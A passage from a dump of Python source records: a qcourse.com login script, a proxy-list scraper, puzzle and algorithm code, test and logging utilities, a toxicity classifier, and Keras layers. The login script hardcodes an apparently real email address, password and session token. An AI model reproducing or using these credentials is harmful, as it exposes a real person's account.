\"Accept-Encoding\": \"gzip, deflate, br\",\n \"Accept-Language\": \"zh-CN,zh;q=0.9\",\n \"Connection\": \"keep-alive\",\n \"Content-Length\": \"33\",\n \"Content-Type\": '',\n \"Cookie\": '',\n \"Host\": \"www.qcourse.com\",\n \"Origin\": \"https://www.qcourse.com\",\n \"Referer\": \"https://www.qcourse.com/\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36\"\n }\n\n cookie = ''\n\n def getVerifyCode():\n param = {'param': '1417053870@qq.com', 'wmax': '130'}\n\n url = 'https://www.qcourse.com/user/get-verify-code'\n\n r = requests.get(url, params=param, verify=False)\n\n code = r.json()['data']['code']\n\n login.cookie = r.cookies\n\n # RequestsCookieJar 转 json\n ck_dict = requests.utils.dict_from_cookiejar(login.cookie)\n\n print(ck_dict)\n\n headers = r.headers\n\n login.header['Content-Type'] = headers['Content-Type']\n login.header['Cookie'] = 'PHPSESSID=' + ck_dict['PHPSESSID']\n\n print(headers)\n\n data = {\n 'code': code\n }\n\n return data\n\n # print(json.loads(Data))\n\n\n def toLogin():\n # 邮箱登录\n\n data = login.getVerifyCode()\n\n param = {'type': '1', 'email': '1417053870@qq.com', 'password': '123456', 'checkcode': data['code']}\n\n url = 'https://www.qcourse.com/user/login'\n\n print(login.header)\n\n r = requests.post(url, params = param, verify = False)\n\n Data = r.json()\n\n print('====')\n print(Data)\n\n def user():\n # 登录状态\n\n param = {'uid': '100000052', 'token': 'NDY5YTc0NJYyZTBlNZAyMThLNmUzYME5NzJhNzI1Zjc='}\n\n url = 'https://api.qcourse.com/login'\n\n r = requests.post(url, params=param, verify=False)\n\n Data = r.cookies\n\n print(type(Data))\n\n # RequestsCookieJar 转 json\n ck_dict = requests.utils.dict_from_cookiejar(Data)\n\n print(ck_dict)\n\n # json 转 RequestsCookieJar\n # ck_jar = requests.utils.cookiejar_from_dict(ck_dict)\n #\n # print(ck_jar)\n\n\n def info():\n # 用户信息\n\n param = {}\n\n url = 'https://www.qcourse.com/user/info'\n\n r = requests.post(url, params=param, verify=False)\n\n Data = r.json()\n\n print(Data)\n\n\n\n","sub_path":"python/www.qcourse.com/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":2534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"221227669","text":"# -*- coding:utf-8 -*-\n\"\"\"\n@File : proxy_spider.py\n@Software : DeepTesting\n@Time : 2018/5/18 5:38\n@Author : yubb\n\"\"\"\nimport scrapy\nfrom crawler.items import ProxyItem\nfrom crawler.spiders import USER_AGENT\n\n\nclass ProxySpider(scrapy.Spider):\n\n name = 'proxy'\n url = 'http://www.xicidaili.com/nn/'\n\n def start_requests(self):\n yield scrapy.Request(url=self.url, headers={'User-Agent': USER_AGENT})\n\n def parse(self, response):\n countries = response.css('td img::attr(alt)').extract()\n ips = response.css('#ip_list tr td:nth-child(2)::text').extract()\n ports = response.css('#ip_list tr td:nth-child(3)::text').extract()\n addrs = response.css('#ip_list tr td:nth-child(4) a::text').extract()\n anonymes = response.css('#ip_list tr td:nth-child(5)::text').extract()\n types = response.css('#ip_list tr td:nth-child(6)::text').extract()\n speeds = response.css('#ip_list tr td:nth-child(7) div::attr(title)').extract()\n link_speeds = response.css('#ip_list tr td:nth-child(8) div::attr(title)').extract()\n alive_times = response.css('#ip_list tr td:nth-child(9)::text').extract()\n check_times = response.css('#ip_list tr td:nth-child(10)::text').extract()\n for idx in range(len(countries)):\n item = ProxyItem()\n item['country'] = countries[idx]\n item['ip'] = ips[idx]\n item['port'] = ports[idx]\n item['addr'] = addrs[idx]\n item['anonym'] = anonymes[idx]\n item['type'] = types[idx]\n item['speed'] = speeds[idx]\n item['link_speed'] = link_speeds[idx]\n item['alive_time'] = alive_times[idx]\n item['check_time'] = check_times[idx]\n yield item\n\n","sub_path":"src/crawler/spiders/proxy_spider.py","file_name":"proxy_spider.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"549940946","text":"from datetime import datetime\n\nclass TimeLog:\n def __init__(self, time, message):\n self.timestamp = datetime.strptime(time, \"%Y-%m-%d %H:%M:%S\")\n self.message = message.rstrip()\n\n def get_id(self):\n tmp = self.message.split()\n return int(tmp[1][1:])\n\nclass GuardLog:\n def __init__(self, id):\n self.id = id\n self.sleepy_time = 0\n self.sleep_tracker = [0] * 60\n \n def most_sleepy_min(self):\n max_min = 0\n max_min_val = self.sleep_tracker[0]\n for ii in range(1,60):\n if self.sleep_tracker[ii] > max_min_val:\n max_min = ii\n max_min_val = self.sleep_tracker[ii]\n return max_min, max_min_val\n\n def pprint(self):\n print(\"{} - slept {} - most sleepy at {} minute mark\".format(self.id, self.sleepy_time, self.most_sleepy_min()))\n # print(self.sleep_tracker)\n\nguard_list = {}\ntime_log = list()\n\nwith open(\"./inputs/day4.txt\", \"r\") as f:\n for line in f:\n time_log.append(TimeLog(line[1:17]+\":00\" , line[19:]))\n\ntime_log.sort(key=lambda x: x.timestamp)\n\ncurrent_guard = \"#?\"\ncurrent_sleep_min = 0\n\nfor log in time_log:\n if log.message.startswith(\"Guard\"):\n current_guard = log.get_id()\n if current_guard not in guard_list:\n guard_list[current_guard] = GuardLog(current_guard)\n elif log.message == \"falls asleep\":\n current_sleep_min = log.timestamp.minute\n elif log.message == \"wakes up\":\n guard_list[current_guard].sleepy_time += log.timestamp.minute - current_sleep_min\n for ii in range(current_sleep_min, log.timestamp.minute):\n guard_list[current_guard].sleep_tracker[ii] += 1 \n\n#part 1\nmax_sleepy_time = 0\nmax_min = 0\nmax_msm_count = 0\n\nfor key, guard in guard_list.items():\n if guard.sleepy_time > max_sleepy_time:\n sleepiest_guard = guard\n max_sleepy_time = guard.sleepy_time\n \n msm, msm_count = guard.most_sleepy_min()\n if msm_count > max_msm_count:\n sleepiest_min_guard = guard\n max_msm_count = msm_count\n max_min = msm\n\nmsm, msm_count = sleepiest_guard.most_sleepy_min()\nprint(\"part 1 answer = {}\".format(sleepiest_guard.id * msm))\nprint(\"part 2 answer = {}\".format(sleepiest_min_guard.id * max_min))","sub_path":"day4.py","file_name":"day4.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"337444916","text":"#刷新当前页面\nfrom selenium import webdriver\nimport unittest,time\n\nclass refreshPageByChrome(unittest.TestCase):\n\n def setUp(self):\n self.driver = webdriver.Chrome(executable_path=r'D:\\pycharm\\chromedriver.exe')\n \n def test_refrshCurrentPage(self):\n url = \"http://www.baidu.com\"\n self.driver.get(url)\n self.driver.maximize_window()\n #刷新当前页面\n self.driver.refresh()\n time.sleep(3)\n \n def tearDown(self):\n self.driver.quit()\n \nif __name__ == '__main__':\n unittest.main()","sub_path":"WebDriverAPI/02refreshCurrenPageTest.py","file_name":"02refreshCurrenPageTest.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"427149384","text":"#-*- coding: utf-8 -*-\n# @Time : 2018/9/13 0013 16:49\n# @Author : zhyipeng\n# @File : __init__.py.py\n\nfrom .user import user\nfrom .main import main\n\nBLUEPRINTS = (\n (user, '/user'),\n (main, '')\n)\n\n\ndef blueprint_config(app):\n '''\n 蓝本配置\n :param app: app名\n :return: None\n '''\n for blueprint, prefix in BLUEPRINTS:\n app.register_blueprint(blueprint, url_prefix=prefix)","sub_path":"APP/views/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"396856173","text":"import logging\r\nfrom collections.abc import Mapping\r\nfrom typing import Dict\r\n\r\nfrom ..node_ports_common import exceptions\r\nfrom ._schema_item import SchemaItem\r\n\r\nlog = logging.getLogger(__name__)\r\n\r\n\r\nclass SchemaItemsList(Mapping):\r\n def __init__(self, data: Dict[str, SchemaItem] = None):\r\n log.debug(\"creating SchemaItemsList with %s\", data)\r\n if not data:\r\n data = {}\r\n self._store = data\r\n\r\n def __getitem__(self, key) -> SchemaItem:\r\n if isinstance(key, int):\r\n if key < len(self._store):\r\n key = list(self._store.keys())[key]\r\n if not key in self._store:\r\n raise exceptions.UnboundPortError(key)\r\n return self._store[key]\r\n\r\n def __iter__(self):\r\n return iter(self._store)\r\n\r\n def __len__(self):\r\n return len(self._store)\r\n","sub_path":"packages/simcore-sdk/src/simcore_sdk/node_ports/_schema_items_list.py","file_name":"_schema_items_list.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"3647921","text":"'''\nAuthor: Allanxu\nDate: 2021-04-12 14:33:13\nLastEditors: Allanxu\nLastEditTime: 2021-04-16 14:44:18\nDescription: ---\n'''\nfrom scipy.io import loadmat\nimport numpy as np\nfrom sklearn.linear_model import LogisticRegression\nimport time\nfrom collections import defaultdict\nimport datatools as dt\nimport PCA_eval as pca \n\n\n\ndef accuracy(label,pred_result):\n pred_result = np.argmax(pred_result,axis=1)\n if len(label) != len(pred_result):\n return False\n count = 0\n for i in range(len(label)):\n if label[i] == pred_result[i]:\n count+=1 \n return count/len(label)\n\n\n\nif __name__ == \"__main__\": \n\n \n main_dir = r\"C:\\Users\\Allan\\Desktop\\AIS\\Bigdata\\COMP7930_Final_Project\"\n data_dir = r\"\\Data\"\n out_dir =r\"\\outfiles\\LogisR\"\n DBs=defaultdict(list)\n DBs['Ya64'] = ['2Train','3Train','4Train','5Train','6Train','7Train','8Train']\n DBs['Ya32'] = ['5Train','10Train','20Train','30Train','40Train','50Train']\n DBs['ORL64'] = ['2Train','3Train','4Train','5Train','6Train','7Train','8Train']\n DBs['ORL32'] = ['2Train','3Train','4Train','5Train','6Train','7Train','8Train']\n\n # raw data loading\n X_Ya64,Y_Ya64 = dt.Load_RawData(main_dir+data_dir+r'\\Yale_64x64.mat')\n X_Ya32,Y_Ya32 = dt.Load_RawData(main_dir+data_dir+r'\\YaleB_32x32.mat')\n X_ORL64,Y_ORL64 = dt.Load_RawData(main_dir+data_dir+r'\\ORL_64x64.mat')\n X_ORL32,Y_ORL32 = dt.Load_RawData(main_dir+data_dir+r'\\ORL_32x32.mat')\n\n\n PCs = {'Ya64':105,'Ya32':714,'ORL64':220,'ORL32':203}\n #count =0 # for debug\n for i in DBs.keys(): # different Data\n loss_arr = []\n for j in DBs[i]: # different splited proportion\n print(\"DB:%s, Set:%s\" % (i,j))\n #for k in range(50): # randomly splits\n #print(main_dir+data_dir+ \"\\\\\"+ i+\"\\\\\"+ j +\"\\\\\" + str(k+1) + '.mat')\n splited_ind = loadmat(main_dir+data_dir+ \"\\\\\"+ i+\"\\\\\"+ j +\"\\\\\" + str(1) + '.mat')\n ind_train = splited_ind['trainIdx'].squeeze()\n ind_test = splited_ind['testIdx'].squeeze()\n if i=='Ya64':\n train,train_y,test,test_y = dt.SetsSplit(X_Ya64,Y_Ya64,ind_train,ind_test)\n elif i=='Ya32':\n train,train_y,test,test_y = dt.SetsSplit(X_Ya32,Y_Ya32,ind_train,ind_test)\n elif i=='ORL64':\n train,train_y,test,test_y = dt.SetsSplit(X_ORL64,Y_ORL64,ind_train,ind_test)\n elif i=='ORL32':\n train,train_y,test,test_y = dt.SetsSplit(X_ORL32,Y_ORL32,ind_train,ind_test)\n else:\n print('data error')\n\n # PCA\n DimRedu = pca.xu_PCA()\n eigenvalues,eigenvectors,sub = DimRedu.PCA(train,PCs[i])\n\n # Logistic regression model\n lr_clf = LogisticRegression(random_state=None, solver='lbfgs',multi_class='auto', verbose = 1,max_iter=10000)\n lr_clf.fit(sub, train_y.reshape(1,-1)[0])\n\n # train prediction loss\n train_pred = lr_clf.predict_proba(sub)\n label_train = train_y.squeeze() - 1\n print('Classfication accuracy with PCA:',accuracy(label_train,train_pred))\n\n # test pca\n sub_test = (test/255.0)@ eigenvectors[:,:PCs[i]]\n test_pred = lr_clf.predict_proba(sub_test)\n # tese prediction loss\n label_test = test_y.squeeze() - 1\n test_acc = accuracy(label_test,test_pred)\n print('Classfication accuracy with PCA:',test_acc)\n loss_arr.append(test_acc)\n \n #for debug\n # count+=1\n # if count>1:\n # break\n\n outfile = open(main_dir+out_dir+'\\\\'+ i +'_acc','w')\n for k in range(len(loss_arr)):\n outfile.write(str(loss_arr[k])+'\\n')\n outfile.close() \n #break # for debug\n ","sub_path":"code/LogisR_eval.py","file_name":"LogisR_eval.py","file_ext":"py","file_size_in_byte":3841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"556256899","text":"class constants(object):\n \n local_path = '/home/lattice/data/Experiments.dir/BranchingRatio.dir/2013Mar20.dir/2018_08.dir/'\n local_timetag_file = '00001 - Timetags 2013Mar20_2018_08.csv'\n datavault_dir = ['Experiments','BranchingRatio','2013Mar20','2018_08']\n ion_number = 13.0\n \n timetag_np_file = local_timetag_file[:-4] + '.npy'\n bin_filename = timetag_np_file[:-4] + '_binned.npy'\n \n ","sub_path":"scripts/archive/branching_ratio/data_analysis/2013Mar21/2018_08_secondhalf/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"447437653","text":"\"\"\"\nGiven a cell with \"it's a fib sequence\" from slideshow,\n please write function \"check_fib\", which accepts a Sequence of integers, and\n returns if the given sequence is a Fibonacci sequence\n\nWe guarantee, that the given sequence contain >= 0 integers inside.\n\n\"\"\"\nfrom math import sqrt\nfrom typing import Sequence\n\n\ndef check_fibonacci(data: Sequence[int]) -> bool:\n \"\"\"Checking if sequence given is a fibonacci sequence\"\"\"\n\n # checking if the first number in sequence is fibonacci number -\n # function returns \"False\" if it's not:\n if not data[0] == 0:\n if not (\n sqrt(5 * (data[0] ** 2) - 4) % 1 == 0\n or sqrt(5 * (data[0] ** 2) + 4) % 1 == 0\n ):\n return False\n # checking if the second number in sequence is fibonacci number -\n # function returns \"False\" if it's not:\n if not (\n sqrt(5 * (data[1] ** 2) - 4) % 1 == 0 or sqrt(5 * (data[1] ** 2) + 4) % 1 == 0\n ):\n return False\n # checking if a sequence given is fibonacci sequence\n index = 0\n while index < len(data) - 2:\n if data[index] + data[index + 1] == data[index + 2]:\n index += 1\n else:\n return False\n return True\n","sub_path":"homework1/task02.py","file_name":"task02.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"522744343","text":"\"\"\"\n@version: 1\n@author: zyb\n@site: \n@software: PyCharm Community Edition\n@file: heapTest.py\n@time: 2017/3/13 16:13\n\"\"\"\n\"\"\"\nn个元素数组\n堆排序,初始数据从len//2以后都是叶子节点,叶子节点可以看做是单节点的堆,从后往前,第一个不是叶子节点的节点开始,比较和左右子节点大小,调整\n成最大堆(初始数组构建最大堆),循环从1到len-1,交换第一个元素和最后一个元素(最后一个元素已经是最大),重新调整1到len-2的元素为最大堆\n\"\"\"\ndef swap(arr,i,j):\n temp=arr[i]\n arr[i]=arr[j]\n arr[j]=temp\n\n'''\n下沉当前i节点,使得当前以i为根节点的树为最大堆\n'''\ndef max_heapify(arr,i,heap_size):\n left=i*2+1\n right=i*2+2\n if leftarr[largest]:\n largest=right\n if largest!=i:\n swap(arr,largest,i)\n max_heapify(arr,largest,heap_size)\n\n\n'''\n把数组构建最大堆,从最后一个非叶子节点(len/2-1)开始构建最大堆,直到i==0\n'''\ndef build_max_heap(arr,len):\n mid=len//2\n i=mid-1\n heap_size=len\n while i>=0:\n #print(i)\n max_heapify(arr,i,len)\n #print(arr)\n i=i-1\n\n\ndef heap_sorted(arr,len):\n build_max_heap(arr,len)\n remind=len-1\n while remind>=1:\n swap(arr,0,remind)\n max_heapify(arr, 0, remind)\n remind = remind - 1\n\n\n\nif __name__==\"__main__\":\n arr = [ 39, 55, 3, 28, 83, 35,56]\n length=len(arr)\n #build_max_heap(arr,length)\n heap_sorted(arr,length)\n print(arr)","sub_path":"heapSort.py","file_name":"heapSort.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"201841687","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics import precision_score, recall_score, f1_score, accuracy_score, classification_report\nfrom sklearn.model_selection import KFold, StratifiedKFold\nfrom sklearn_pandas import DataFrameMapper\nimport algorithms\nimport data_cleaner\n\nclass STRUDEL_MODEL:\n def __init__(self, X_train, Y_train):\n self.vectorizer = TfidfVectorizer(analyzer='word', token_pattern=r'\\w{1,}', ngram_range=(1,1),max_features=5000)\n\n self.mapper = None\n self.Y = None\n self.X = None\n\n self.clf = algorithms.linear_svm_model()\n self.__prepare_data(X_train, Y_train)\n self.model=self.train()\n\n\n def __prepare_data(self, X_train, Y_train):\n self.mapper = DataFrameMapper([\n ('text', self.vectorizer),\n ('num_url', None),\n ('num_emoji', None),\n ('num_mention', None),\n ('nltk_score', None),\n ('subjectivity', None),\n ('polarity', None),\n ('perspective_score', None),\n ('stanford_polite', None),\n ])\n self.Y = np.ravel(Y_train)\n\n self.X = self.mapper.fit_transform(X_train) # adding the other features with bagofwords\n\n def train(self):\n print(\"Training the model with \" + str(len(self.Y)) + \" instances and \" + str(\n self.X.shape[1]) + \" features\")\n self.clf.fit(self.X, self.Y)\n print(\"Model training complete ..\")\n return self.clf\n\n def predict(self, X_test):\n X_test_mapped = self.mapper.transform(X_test)\n predictions = self.model.predict(X_test_mapped)\n return np.expand_dims(predictions, 1)\n\n\ndef read_dataframe_from_excel(file):\n dataframe = pd.read_excel(file)\n return dataframe\n\nprint(\"Reading dataset..\")\n#training_data = read_dataframe_from_excel(\"models/code_review_preprocessed.xlsx\")\ntraining_data = read_dataframe_from_excel(\"models/STRUDEL-issue-comments-dataset.xlsx\")\n\nprint(\"Applying SE domain specific cleaning steps..\")\ntraining_data[\"text\"] = training_data.text.astype(str).apply(data_cleaner.clean_text)\n\nkf = StratifiedKFold(n_splits=10, shuffle=True, random_state=999)\n\nfilename = \"results/strudel-CV-issue-comments.csv\"\n#filename = \"results/strudel-CV-code-review.csv\"\ntraining_log = open(filename, 'w')\ntraining_log.write(\"Fold,precision_0,recall_0,f-score_0,precision_1,recall_1,f-score_1,accuracy\\n\")\n\ncount =1\nresults=\"\"\nprint(\"Starting 10-fold cross validations..\")\nfor train_index, test_index in kf.split(training_data, training_data[\"is_toxic\"]):\n\n X_train, X_test = training_data.loc[train_index, [\"text\", \"perspective_score\",\t\"num_url\",\n \"num_emoji\",\t\"num_mention\",\t\"nltk_score\", \"num_reference\",\n \"subjectivity\",\t\"polarity\",\t\"stanford_polite\"]], \\\n training_data.loc[test_index, [\"text\", \"perspective_score\",\t\"num_url\",\n \"num_emoji\",\t\"num_mention\",\t\"nltk_score\", \"num_reference\",\n \"subjectivity\",\t\"polarity\",\t\"stanford_polite\"]]\n\n Y_train, Y_test = training_data.loc[train_index, \"is_toxic\"], training_data.loc[test_index, \"is_toxic\"]\n\n print(\"Fold# \"+ str(count))\n classifier_model = STRUDEL_MODEL(X_train, Y_train)\n\n predictions = classifier_model.predict(X_test)\n\n precision_1 = precision_score(Y_test, predictions, pos_label=1)\n recall_1 = recall_score(Y_test, predictions, pos_label=1)\n f1score_1 = f1_score(Y_test, predictions, pos_label=1)\n\n precision_0 = precision_score(Y_test, predictions, pos_label=0)\n recall_0 = recall_score(Y_test, predictions, pos_label=0)\n f1score_0 = f1_score(Y_test, predictions, pos_label=0)\n accuracy = accuracy_score(Y_test, predictions)\n results = results + str(count) + \",\"\n\n results = results + str(precision_0) + \",\" + str(recall_0) + \",\" + str(f1score_0)\n results = results + \",\" + str(precision_1) + \",\" + str(recall_1) + \",\" + str(f1score_1) + \\\n \",\" + str(accuracy) + \"\\n\"\n\n print(classification_report(Y_test, predictions))\n\n count += 1\ntraining_log.write(results)\ntraining_log.flush()","sub_path":"WSU_SEAL/STRUDEL_CV.py","file_name":"STRUDEL_CV.py","file_ext":"py","file_size_in_byte":4311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"646604545","text":"'''\nAuthor: Shuailin Chen\nCreated Date: 2021-09-30\nLast Modified: 2021-10-26\n\tcontent: \n'''\n\n\nmodel = dict(\n pretrained=None,\n backbone=dict(\n type='ResNetV1c',\n depth=18,\n in_channels=3,\n out_indices=[4], # x: stage-x + 1\n norm_cfg=dict(type='SyncBN'),\n # set output stride=8\n # dilations=(1, 1, 2, 4),\n # strides=(1, 2, 1, 1),\n ),\n)","sub_path":"configs/selfsup/_base_/models/r18-d32.py","file_name":"r18-d32.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"549988708","text":"from collections import defaultdict\nimport ast, operator\n\nwith open('in.txt') as f:\n lines = f.read().splitlines()\n\ndef visit(node):\n contents = []\n for _, value in ast.iter_fields(node):\n if isinstance(value, ast.AST):\n value = [value]\n if isinstance(value, list):\n contents.extend(visit(item) for item in value)\n\n return defaultdict(lambda: lambda: None, {\n 'Constant': lambda: node.value,\n 'Expr': lambda: contents[0],\n 'Module': lambda: contents[0],\n 'BinOp': lambda: {\n 'Add': operator.add,\n 'Sub': operator.mul\n }[type(node.op).__name__](contents[0], contents[2])\n })[type(node).__name__]()\n\nvalues = []\nfor line in lines:\n line = line.translate(''.maketrans({'*': '-'}))\n values.append(visit(ast.parse(line)))\n\nprint(sum(values))\n","sub_path":"2020/18/18.py","file_name":"18.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"118615960","text":"# Copyright 2018 Red Hat, Inc.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport logging\nimport os\nimport sys\n\nfrom paunch import constants\nfrom paunch import utils\n\n\ndef configure_logging(name, level=3, log_file=None):\n '''Mimic oslo_log default levels and formatting for the logger. '''\n log = logging.getLogger(name)\n\n if level and level > 2:\n ll = logging.DEBUG\n elif level and level == 2:\n ll = logging.INFO\n else:\n ll = logging.WARNING\n\n log.setLevel(ll)\n handler = logging.StreamHandler(sys.stderr)\n handler.setLevel(ll)\n if log_file:\n fhandler = logging.FileHandler(log_file)\n formatter = logging.Formatter(\n '%(asctime)s.%(msecs)03d %(process)d %(levelname)s '\n '%(name)s [ ] %(message)s',\n '%Y-%m-%d %H:%M:%S')\n fhandler.setLevel(ll)\n fhandler.setFormatter(formatter)\n log.addHandler(fhandler)\n log.addHandler(handler)\n log.propagate = False\n\n return log\n\n\ndef configure_logging_from_args(name, app_args):\n # takes 1, or 2 if --verbose, or 4 - 5 if --debug\n log_level = (app_args.verbose_level +\n int(app_args.debug) * 3)\n\n # if executed as root log to specified file or default log file\n if os.getuid() == 0:\n log_file = app_args.log_file or constants.LOG_FILE\n else:\n log_file = app_args.log_file\n\n log = utils.common.configure_logging(\n __name__, log_level, log_file)\n return (log, log_file, log_level)\n","sub_path":"paunch/utils/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"395020791","text":"import tensorflow as tf\nfrom tensorflow import keras\n\ndef Bottle_block2(filters=1, inputs=None):\n x = keras.layers.Conv2D(filters=filters, kernel_size=3, strides=1, padding='same')(inputs)\n x = keras.layers.BatchNormalization()(x)\n x = keras.layers.Activation('relu')(x)\n x = keras.layers.Conv2D(filters=filters, kernel_size=3, strides=1, padding='same')(x)\n x = keras.layers.BatchNormalization()(x)\n shortcut = inputs\n x = keras.layers.add([shortcut, x])\n x = keras.layers.Activation('relu')(x)\n return x\n\n\ndef Bottle_block2t(filters=1, inputs=None):\n x = keras.layers.Conv2D(filters=filters, kernel_size=3, strides=1, padding='same')(inputs)\n x = keras.layers.BatchNormalization()(x)\n x = keras.layers.Activation('relu')(x)\n x = keras.layers.Conv2D(filters=filters, kernel_size=3, strides=1, padding='same')(x)\n x = keras.layers.BatchNormalization()(x)\n shortcut = keras.layers.Conv2D(filters=filters, kernel_size=1, strides=1, padding='same')(inputs)\n x = keras.layers.add([shortcut, x])\n x = keras.layers.Activation('relu')(x)\n return x\n\n\ndef Bottle_block3(filters, inputs, stride=1, downsample=None):\n expansion = 4\n x = keras.layers.Conv2D(filters=filters, kernel_size=1, strides=1, padding='same', kernel_regularizer=keras.regularizers.l2(0.0005))(inputs)\n x = keras.layers.BatchNormalization()(x)\n x = keras.layers.Activation('relu')(x)\n x = keras.layers.Conv2D(filters=filters, kernel_size=3, strides=stride, padding='same', kernel_regularizer=keras.regularizers.l2(0.0005))(x)\n x = keras.layers.BatchNormalization()(x)\n x = keras.layers.Activation('relu')(x)\n x = keras.layers.Conv2D(filters=filters * expansion, kernel_size=1, strides=1, padding='same', kernel_regularizer=keras.regularizers.l2(0.0005))(x)\n x = keras.layers.BatchNormalization()(x)\n if downsample:\n shortcut = downsample(inputs)\n else:\n shortcut = inputs\n x = keras.layers.add([shortcut, x])\n # x = keras.layers.Activation('relu')(x)\n return x\n\n\n# Center layer, described in \"A Discriminative Feature Learning Approach for Deep Face Recognition\"\nclass Center(keras.layers.Layer):\n def __init__(self, output_dim, **kwargs):\n self.output_dim = output_dim\n super(Center, self).__init__(**kwargs)\n\n def build(self, input_shape):\n center_shape = tf.TensorShape((input_shape[1], self.output_dim))\n self.center = self.add_weight(name='center',\n shape=center_shape,\n initializer='uniform',\n trainable=True)\n super(Center, self).build(input_shape)\n\n def call(self, inputs, *args, **kwargs):\n center = tf.reshape(self.center[:, 0], [1, inputs.shape[1]])\n diff = tf.reshape(tf.square(tf.norm(inputs - center, axis=1)), [-1, 1])\n for m in range(1, self.output_dim):\n center_m = tf.reshape(self.center[:, m], [1, inputs.shape[1]])\n diff_m = tf.reshape(tf.square(tf.norm(inputs - center_m, axis=1)), [-1, 1])\n diff = tf.concat([diff, diff_m], axis=1)\n return diff\n\n def compute_output_shape(self, input_shape):\n shape = tf.TensorShape((input_shape[0], self.output_dim))\n return shape\n\n\n# Euclid layer, calculate the distance between feature and centers\n# Now it works, but result is bad\nclass Euclid(keras.layers.Layer):\n def __init__(self, output_dim, **kwargs):\n self.output_dim = output_dim\n super(Euclid, self).__init__(**kwargs)\n\n def build(self, input_shape):\n kernel_shape = tf.TensorShape((self.output_dim, input_shape[1]))\n self.kernel = self.add_weight(name='center_kernel',\n shape=kernel_shape,\n initializer='uniform',\n trainable=True)\n super(Euclid, self).build(input_shape)\n\n def call(self, inputs, *args, **kwargs):\n kernels = tf.expand_dims(self.kernel, axis=0)\n features = tf.expand_dims(inputs, axis=1)\n diff1 = tf.reshape(tf.reduce_sum(tf.squared_difference(kernels, features), axis=2), [-1, self.output_dim])\n # diff1 = tf.reshape(tf.reduce_sum(tf.math.abs(kernels - features), axis=2), [-1, self.output_dim])\n diff_min = []\n for m in range(self.output_dim):\n center_m = tf.reshape(self.kernel[m], shape=[1, -1])\n diff_m = tf.reduce_sum(tf.squared_difference(self.kernel, center_m), axis=1)\n # diff_m = tf.reduce_sum(tf.math.abs(self.kernel - center_m), axis=1)\n diff_m = tf.concat([diff_m[:m], diff_m[m+1:]], axis=0)\n diff_m = diff_m[tf.math.argmin(diff_m)]\n diff_min.append(diff_m)\n diff_min = tf.reshape(tf.convert_to_tensor(diff_min), shape=[1, -1])\n inter_diff = tf.reduce_mean(diff_min)\n zeros = tf.zeros(shape=[tf.shape(inputs)[0], 1])\n inter_diff = zeros + inter_diff\n return tf.concat([diff1, inter_diff], axis=1)\n # return diff1, inter_diff\n\n def compute_output_shape(self, input_shape):\n shape = tf.TensorShape((input_shape[0], self.output_dim))\n return shape\n\n# Identity_init for custom layer's kernel init\ndef Identity_init(shape, dtype=tf.float32, *args, **kwargs):\n row = tf.cast(shape[0], dtype=tf.int32)\n col = tf.cast(shape[1], dtype=tf.int32)\n return tf.eye(row, col, dtype=dtype)\n\n\nclass Euclid2(keras.layers.Layer):\n def __init__(self, output_dim, **kwargs):\n self.output_dim = output_dim\n super(Euclid2, self).__init__(**kwargs)\n\n def build(self, input_shape):\n kernel_shape = tf.TensorShape([self.output_dim, input_shape[1]])\n t_shape = tf.TensorShape([input_shape[1], input_shape[1]])\n self.kernel = self.add_weight(name='center_kernel',\n shape=kernel_shape,\n initializer='uniform',\n trainable=True)\n self.T = self.add_weight(name='M_transform',\n shape=t_shape,\n initializer=Identity_init,\n trainable=True)\n super(Euclid2, self).build(input_shape)\n\n def call(self, inputs, *args, **kwargs):\n batch_size = tf.shape(inputs)[0]\n kernels = tf.expand_dims(self.kernel, axis=0)\n features = tf.expand_dims(inputs, axis=1)\n T = tf.expand_dims(tf.matmul(self.T, self.T, transpose_b=True), axis=0)\n Ts = tf.tile(T, multiples=[batch_size, 1, 1])\n substract = features - kernels\n dis = tf.matmul(substract @ Ts, substract, transpose_b=True)\n out = 